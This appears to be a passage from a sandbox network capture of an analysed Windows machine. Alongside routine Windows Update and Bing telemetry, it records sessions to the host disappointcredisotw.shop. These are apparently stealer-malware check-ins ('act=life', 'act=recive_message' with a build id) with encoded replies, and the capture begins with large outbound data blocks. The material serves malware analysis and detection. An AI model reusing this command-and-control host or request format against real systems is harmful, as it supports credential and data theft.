2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: eb 9d f3 d3 81 36 28 05 00 39 b8 3e 3c 0c 0d e8 b0 b4 88 81 68 42 dd 98 4e 0d b4 ed 74 03 da 3f 62 d7 8b cb ce a7 48 9f cf b8 18 6d 83 0d 08 f1 86 fa 02 58 38 5a 68 11 06 14 de 4a 17 46 d8 fe b5 fe ce c4 ed 2a a9 e3 41 30 95 25 64 30 f7 32 67 6d 3e 0b c1 4a e9 a7 38 35 e4 4e 80 fb a6 cd 40 29 0d 6a 79 c2 4d b3 9f 07 e1 04 c1 0d 7a 1e 49 9a 10 28 d6 16 15 85 62 99 2f b7 15 16 b6 4d 15 aa 79 3a 22 03 fa 46 fb ba 7b 3f 13 65 40 64 1e 51 54 6b 3f bd bf d5 92 a7 6b c6 f1 46 2c 7d 50 e9 78 e9 a4 d7 25 cc 93 f3 2e c1 be 7d b4 01 39 16 5f 8f b4 60 4d c9 3c 07 40 d7 20 73 10 a8 28 ac 49 a5 73 96 1d f8 26 7c c5 e7 9b df d1 b4 d6 32 e5 9d 46 45 f3 50 c4 57 b1 6a f3 bc b2 57 c0 d2 ab f7 fa cc 87 47 7b bd cd c7 fb 87 48 16 1e 64 a1 62 47 ed fa b8 73 4f f0 66 d8 d9 eb Data Ascii: 6(9><hBNt?bHmX8ZhJF*A0%d02gm>J85N@)jyMzI(b/My:"F{?e@dQTk?kF,}Px%.}9_`M<@ s(Is&\|2FEPWjWG{HdbGsOf
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 02 48 ad 8a 68 77 b7 94 96 9d 47 a4 7c 8b db 88 ab 04 4c 77 72 80 02 f0 12 57 8b b7 93 fa f8 c0 c9 c9 b2 d2 59 d9 c7 86 18 77 27 77 5e ee cd 67 60 d5 aa 53 67 fd 94 41 ac 17 e0 db fe 49 e9 69 de 9d 06 de be e1 50 76 b4 c2 51 1c d7 21 c7 d3 fd 8c ab 1b 67 67 4f 89 a4 52 46 da c2 db 28 03 ac d5 e2 bb 09 51 1a ec fa 94 95 15 2b 61 e2 9b 15 da ea ca 56 5b 1c 8a 2d a8 c9 ef f0 d6 12 ac 73 f8 a5 ee 23 84 48 33 e7 75 6e a2 fe 7b 87 8c a6 c3 cd 3a 95 ec ff 7a ff a3 7e 42 d9 0f 1a a6 1d b3 46 54 02 38 77 8b f5 92 c6 33 34 e0 b5 12 2c ac bc 30 00 03 75 31 0e 07 e2 19 87 07 65 58 87 3f c4 87 ae 45 e8 6a 5e a7 d8 6d 23 3b 37 43 5e 8c c8 6b 5e 5f 3c 2a 98 ad 6b 79 c7 d8 5d 56 1b 50 d6 4e 26 0d ee 31 1f 92 18 29 dd 1e bf c5 e2 4f ed 8d 7e 2e 6d be 10 0c 38 91 99 70 6c Data Ascii: HhwG\|LwrWYw'w^g`SgAIiPvQ!ggORF(Q+aV[-s#H3un{:z~BFT8w34,0u1eX?Ej^m#;7C^k^_<*ky]VPN&1)O~.m8pl
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: e8 f2 22 41 a4 ee 1e b0 e3 2a c5 52 7f 7c 2d c0 4e 9a 83 9e e6 8c de b9 97 3d 91 48 86 c6 04 de 77 d9 1a 29 3f eb b4 41 45 20 93 c9 7b f6 ad 7d 53 df fb 84 6e 7e 63 d0 19 17 6e 5d b0 8a 40 0a 9c fe f2 8f c3 c6 40 53 68 52 2e ff d7 51 52 7f 79 29 fa 0c b4 11 70 f4 d6 14 60 39 44 de 87 22 d8 b1 70 6c 70 22 58 e5 83 27 c0 12 7f 77 9e 6d 6a 7a e7 60 c9 49 70 f2 e7 72 9f 32 45 82 62 04 bc e2 4f 00 c3 71 f3 82 28 06 f5 48 70 8b 2a e6 cb 42 6f 08 8e 41 2d 02 a9 47 7f 45 20 6b 9d a0 b2 48 84 0e d6 84 5f 9e 18 3a 6a 17 f1 a4 6c 0b bc 51 13 74 a1 84 4b 82 5e 13 c9 df 80 c4 12 21 78 0f 8b 24 32 36 80 a4 a2 15 72 6c e1 82 b7 7a 01 89 7c 5c 18 13 19 02 8e 96 d8 7c 3c e3 f4 11 78 71 81 e3 f5 bc 90 cb 20 e2 4b e0 83 8d 5f 7b b8 36 75 f1 fd 23 96 c8 3b 74 3b 96 77 48 f7 Data Ascii: "AR\|-N=Hw)?AE {}Sn~cn]@@ShR.QRy)p`9D"plp"X'wmjz`Ipr2EbOq(HpBoA-GE kH_:jlQtK^!x$26rlz\|\\|<xq K_{6u#;t;wH
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: e4 08 e8 94 9a 92 95 0e 72 35 db 3b c3 42 cc df fe 48 78 76 11 62 4d bb 1f 40 b8 b4 b3 5f 31 35 74 76 aa 34 1b 73 92 db 65 4f 29 95 f2 9d 11 29 7c 60 b0 e9 cd 1f 11 f0 a4 db eb e7 0f c3 bc 1e d4 03 97 c0 a7 26 68 ed 54 8d 83 5c 10 5c f9 5c 52 9b 50 3a 49 fc 67 b2 f2 b5 06 06 93 24 1a 81 4b 6d 31 6a 5f 57 11 b2 d4 0f 8e 0b 1f b8 ce f1 c3 8d 03 66 80 3c 1e 34 fa 65 33 9c e4 51 e8 cb 59 82 af b0 80 1c 1a ae c5 8b fb c9 da c7 87 01 15 fd 69 64 0a 3e 0a ac ad f1 03 36 7b 1b dd 2a 6e e6 82 33 8d 0d 0c f8 4f 28 de 88 db dc 17 8e e1 dd 3a 10 31 3c d1 ea 72 b2 b3 2d e6 06 62 63 07 e0 cc 6a ba ee af 5c 55 b6 30 e0 f1 88 79 a3 ac a8 79 8c ce 1f 08 70 37 0d fd 6c 7e b2 38 1b 41 28 2d 75 66 d5 99 d0 e3 46 4c 15 ac 6d 81 60 ff f2 d4 9d af ef 6d 60 29 17 22 df 83 7a 60 Data Ascii: r5;BHxvbM@_15tv4seO))\|`&hT\\\RP:Ig$Km1j_Wf<4e3QYid>6{*n3O(:1<r-bcj\U0yyp7l~8A(-ufFLm`m`)"z`
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: b4 3e c4 e7 9c a8 23 72 e4 6e d1 2b 7e 63 0d 63 ba 87 fb a4 98 3e 28 f2 7b 97 34 aa 7f fb 4b 01 ff 93 ad 5d 44 99 ef 5a ed 3d cc 89 c8 17 0a 4d 95 24 9a f0 44 66 5c c0 3e 62 9f ab af 06 9f 13 0b 1c 62 b4 14 27 39 29 29 0f dc 17 ce 95 48 35 1c 1b e2 c3 b4 0c 04 be 65 8f 99 b1 8c 75 1e 13 b3 6f 77 45 e0 c0 28 53 0b f7 24 c4 62 4a f9 34 d3 29 b9 20 47 e8 fa 74 9c 58 3f 74 7d fb fb b7 e5 df b1 58 ab f0 a0 3f 62 ff d2 1f e0 77 00 9d 0e b6 e8 96 58 90 c2 71 a0 31 c9 f0 0d b0 5a 55 f0 99 85 38 11 92 ae 2d 74 7f cf 7b d6 fa 22 00 0a 6c b8 2c e4 0a bc ed 02 46 58 0e 30 74 23 4a 42 72 3d 9c 4f 02 a6 7b de 07 f3 12 6b ae cb 29 af 39 d2 15 65 a8 db a7 14 36 e3 a1 f8 01 b9 75 1f f3 c3 fb ba b5 2b 67 2c 26 3d 25 f0 2c 3a dd 2d 32 2c a3 b9 2d d7 3e a4 a7 1a 2d 7c 7e d9 Data Ascii: >#rn+~cc>({4K]DZ=M$Df\>bb'9))H5euowE(S$bJ4) GtX?t}X?bwXq1ZU8-t{"l,FX0t#JBr=O{k)9e6u+g,&=%,:-2,->-\|~
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 1a 09 b0 15 d1 b4 e1 44 bf 95 44 26 88 7d 41 cb 15 46 4c 44 0f 93 f9 7e d6 f5 db 5e f2 80 71 fe ae 57 36 1c 94 61 42 f1 31 4e 0a 80 b1 6a 70 b8 da ac 7f 7c 5b cf db 93 3a c7 74 f7 ac a0 12 94 ae 6d 67 05 92 ec 3e 12 78 93 80 46 3f 62 46 32 c8 b1 fb 76 c2 7d cf 9e 31 82 94 4f 5a 30 3a 9b 29 30 9e c8 78 7f da 88 b0 eb 1f ae f8 9a 73 93 b3 ad 1a a8 3d 4e 06 16 a8 02 dd 4d 0f 25 28 67 cb d7 3f f2 92 71 50 7c 1b a7 8f 70 ee 12 8a 15 24 aa ea 4c 63 48 88 c1 b6 ce dc 92 36 b1 0f ae 2c ed ac 72 4b a8 9f 55 b7 bb 25 48 09 73 77 f4 57 88 73 47 a1 9e be b3 79 04 7f 15 02 97 89 c3 63 77 1d 3c 30 32 5f f9 8f 1f 20 f7 d5 f6 d8 58 e0 3a b9 e6 2c d9 17 aa cc ae ac f5 14 5d 96 ed e0 fa 7b 80 15 86 3c d8 3e c1 81 3d 45 3c 8d 69 12 52 56 64 86 20 a2 78 22 d4 16 5a b6 5f 3b Data Ascii: DD&}AFLD~^qW6aB1Njp\|[:tmg>xF?bF2v}1OZ0:)0xs=NM%(g?qP\|p$LcH6,rKU%HswWsGycw<02_ X:,]{<>=E<iRVd x"Z_;
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 7d 83 7d f1 a3 f8 b6 9f 1d 78 dc c1 11 5d 44 1b e7 48 5b 9b e8 b8 10 dc 17 2e 1e 2f 05 3e cc 41 1c 88 1b 2c 90 83 91 66 30 28 bc 75 c6 61 2c 29 e8 f1 50 d1 3a 3b c5 2e f7 db ab a8 6a b5 46 8b c8 c5 13 36 7b 60 61 2c 9c be 42 bd 1b 24 ca 1b e3 e3 00 1a fc 0a 74 d6 83 9b a6 ca 30 64 ff 4f c4 d8 f7 67 51 96 47 a3 77 15 cc 99 a0 52 50 71 78 1a 47 0c 22 86 fd 76 fb 71 a8 e9 2b 43 9e 55 a8 be a4 4f ed fc d3 13 66 9b 1a 10 2b 56 28 4b fc 76 61 0f e1 9e be fd cd 1f 43 48 28 e8 60 4f fe b5 46 48 41 4e 9c 6c 8c 02 fa 1e fe 78 79 e8 fd d2 a0 7d 0f 7f 5e f2 86 89 1e 2f 7c 38 2e 6c 82 1e 65 ea 93 42 82 1a 59 6c 4a 11 2d c2 22 da 7c 56 84 df 49 64 10 57 72 ef 1c 46 3b 2b fc f3 0e 7d fa ff 77 91 06 1e 6b 44 d3 a1 a5 cd 35 cd 8b c9 02 6f 06 f2 b2 70 c8 03 3b a1 8d 77 42 Data Ascii: }}x]DH[./>A,f0(ua,)P:;.jF6{`a,B$t0dOgQGwRPqxG"vq+CUOf+V(KvaCH(`OFHANlxy}^/\|8.leBYlJ-"\|VIdWrF;+}wkD5op;wB
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 0d a3 cd 1b a7 f1 94 54 c2 b5 6f 74 d4 e1 03 61 02 da 27 58 0e dc 62 ae 4d 8e ed 6c b7 2c 04 b2 1a 52 6d 29 ae 70 85 15 e8 4f 0c b2 f8 e8 cd 3a f8 21 9e 68 16 71 6f c8 ae 0d 0e 28 40 01 af 6f f9 8b 3f ce 26 9f 01 5b 64 21 af ed 4f 1b 1c 7d 17 0d c7 9f 79 44 9a dd a5 c4 9d 0f 05 7a 82 d1 7e 23 bb 63 8e bc 2a c1 41 36 21 fc 51 39 2d d2 1c bd ac 27 50 5b 0e 28 fd b3 c5 98 c8 29 1b 4b 82 3c 28 cf 49 84 bd 53 01 a9 50 4c 6b 96 22 51 07 16 6e 6e 92 e7 6f fe 43 ed eb 45 ff 33 7e 8f e5 0a 55 74 0c 32 ad 9f 02 6e f3 bc 61 9e 8f 64 98 2f 64 9f 02 47 26 ea 8e 2a 80 09 97 61 4b 29 96 86 66 6c d9 80 a3 f6 c9 cb 2e ce 47 4b f8 a4 df 75 04 3b 95 d2 93 b7 e3 3e 8a d8 e8 a7 f9 2c 3d 59 d8 0c d1 fc b0 a8 25 41 b0 6d 26 65 ae 39 9e 58 ec 66 45 54 ea db 8b 45 b3 33 c8 6f cf Data Ascii: Tota'XbMl,Rm)pO:!hqo(@o?&[d!O}yDz~#cA6!Q9-'P[()K<(ISPLk"QnnoCE3~Ut2nad/dG&aK)fl.GKu;>,=Y%Am&e9XfETE3o
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 61 c2 5e 2d 98 21 c4 94 20 76 2f 67 a9 88 d5 49 75 23 9f 4a 99 9d 55 c2 af 8c e2 f8 2b 39 8b bd bf b9 ab c7 14 63 fd 09 c8 cc c2 94 33 3c 21 8a 97 c4 0e 7c f5 9f e7 d4 5f 19 d0 90 dc 9d d7 66 b9 2b 5f 57 9a b3 8e c0 5f 34 5b a2 ef ad 39 d7 86 b1 a3 05 e8 ff 0e 51 57 ac d6 7d 13 bb 8c 0b dd 27 1c c2 d0 54 5f 0f a5 3b b3 8e f7 2a d8 67 18 1d fd 93 ef a3 dc 44 04 db c9 6f 26 7f 9f 5b 81 d8 6c ff 2d e6 ef 84 17 00 f3 47 c7 2e 73 2e af 79 7d 6f 6a d1 fd 8d 20 02 5a 53 53 20 e3 0a cc 1e 31 d2 1a 04 fc 9d f8 97 c2 7c 0c 6c eb 2b aa 97 22 55 3c 98 f7 ff 25 2e 4a e7 72 8d 95 0e 2a 38 15 63 7c c5 08 bc fd bc 68 08 72 4f 1b 1c 62 84 30 0d 93 f5 77 96 f5 57 84 63 29 f5 29 17 3b f9 fc e1 d2 5d 8b ef 74 9a 21 f3 64 99 ba 9b 2c 25 6a 7f 96 f4 09 30 b3 24 89 45 7e 8e 4a Data Ascii: a^-! v/gIu#JU+9c3<!\|_f+_W_4[9QW}'T_;gDo&[l-G.s.y}oj ZSS 1\|l+"U<%.Jr8c\|hrOb0wWc));]t!d,%j0$E~J
2024-06-23 22:10:45 UTC	812	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ubt06au7ne2v067dm3f0gd1pan; expires=Thu, 17-Oct-2024 15:57:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTEfd0EllniYmDNrvTN%2Bs8dL%2Fdq7%2F46l5cVCF%2BTmfoeTjnuBtkDwGTJoeq2sJ%2BK2ofksn9PATrko6UJpt2nK8VPmBV41MXwhCwZGbWFMQkTh6jANOW0kw8Xec2a88VByNk60E%2FGH4fA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf55b8537cf4-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	52893	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:45 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=snCtFLruYoD2GD+&MD=SB3RsRL1 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-23 22:10:45 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 21cd4213-c079-490a-bafe-7f3e4b2aa4c8 MS-RequestId: caf87a3e-6b85-4337-847d-c6f4f5769a5c MS-CV: uzIiYkNv0UqHk2S7.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 23 Jun 2024 22:10:44 GMT Connection: close Content-Length: 30005
2024-06-23 22:10:45 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-06-23 22:10:45 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	52897	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:45 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1719180584053&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-06-23 22:10:45 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-06-23 22:10:45 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-06-23 22:10:46 UTC	480	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: EB1FC80D3E8B4F509038FF4536F35078 Ref B: LAX311000115035 Ref C: 2024-06-23T22:10:45Z Date: Sun, 23 Jun 2024 22:10:45 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1719180645.37feca72

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	52904	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:48 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: disappointcredisotw.shop
2024-06-23 22:10:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-06-23 22:10:49 UTC	814	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9sqp2fq08vb77690c7n0o0ukr2; expires=Thu, 17-Oct-2024 15:57:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEUpK3uP5QtNgBVUO%2BtnuI1P%2BzbloABk6jeYzITDpTjIZ2o7j9Q%2FpWMwmfy3lnD3Rc7z9Hvx7cUnsktGjKh%2Brro3JYfceTIa5ZHjE01pIi1wXdBJR7bzXB%2F0JvulgRlq3KFfu1QVvyeQHL4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf6c9d3a0cb1-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:49 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-06-23 22:10:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	52908	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:49 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: disappointcredisotw.shop
2024-06-23 22:10:49 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 57 57 58 4c 46 2d 2d 34 35 31 35 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=DWWXLF--4515&j=default
2024-06-23 22:10:49 UTC	822	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1tvppkopn1ljdnabvbsk24f0p4; expires=Thu, 17-Oct-2024 15:57:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3MJL%2F7PcPrgWzlFZ%2B9%2FMT5Etlxm9UXYFL0vJT6Ys9vRXnNR%2F%2Fwu%2BaYD4p6drO%2BwvZuQ7Hn5LsbrwlscaW%2B6X1r7aVlodYEE87vRPrQbHnG4aT%2FHymSzTlKaSje9NLCmuABRS2Tcl5l8oIuw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf73ca5fc43b-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:49 UTC	547	IN	Data Raw: 31 66 32 65 0d 0a 76 59 2b 54 39 6f 6d 67 6d 56 75 66 2b 41 67 67 41 53 64 77 58 72 75 68 4e 37 53 7a 67 54 5a 65 7a 67 41 52 36 62 4b 31 53 55 62 47 68 5a 72 55 2f 34 4b 6a 65 36 76 55 41 69 6b 6a 56 42 56 38 67 59 46 44 78 73 62 6b 47 6c 54 48 49 6e 43 4e 6b 49 39 70 49 4e 7a 6a 34 4a 4f 6c 71 70 42 35 2b 6f 41 71 47 69 46 38 65 6c 65 79 32 68 65 57 31 75 38 55 5a 4f 34 69 64 49 50 51 31 43 55 6b 33 4f 54 38 68 75 58 44 38 54 66 34 6b 47 31 44 5a 55 59 63 4d 39 37 45 55 74 58 5a 37 31 38 7a 70 6d 30 7a 78 5a 4b 58 4c 44 79 66 74 62 50 55 78 4d 58 74 4f 74 4b 5a 65 30 73 6a 42 77 31 79 73 61 67 2b 7a 35 4f 6a 55 7a 44 73 4f 6a 48 4c 30 39 41 72 4b 74 76 72 2b 4a 37 68 79 50 30 34 2b 35 4a 34 53 57 64 50 47 44 7a 66 79 46 6a 65 77 2b 31 51 4e 4b 42 6a 66 Data Ascii: 1f2evY+T9omgmVuf+AggASdwXruhN7SzgTZezgAR6bK1SUbGhZrU/4Kje6vUAikjVBV8gYFDxsbkGlTHInCNkI9pINzj4JOlqpB5+oAqGiF8eley2heW1u8UZO4idIPQ1CUk3OT8huXD8Tf4kG1DZUYcM97EUtXZ718zpm0zxZKXLDyftbPUxMXtOtKZe0sjBw1ysag+z5OjUzDsOjHL09ArKtvr+J7hyP04+5J4SWdPGDzfyFjew+1QNKBjf
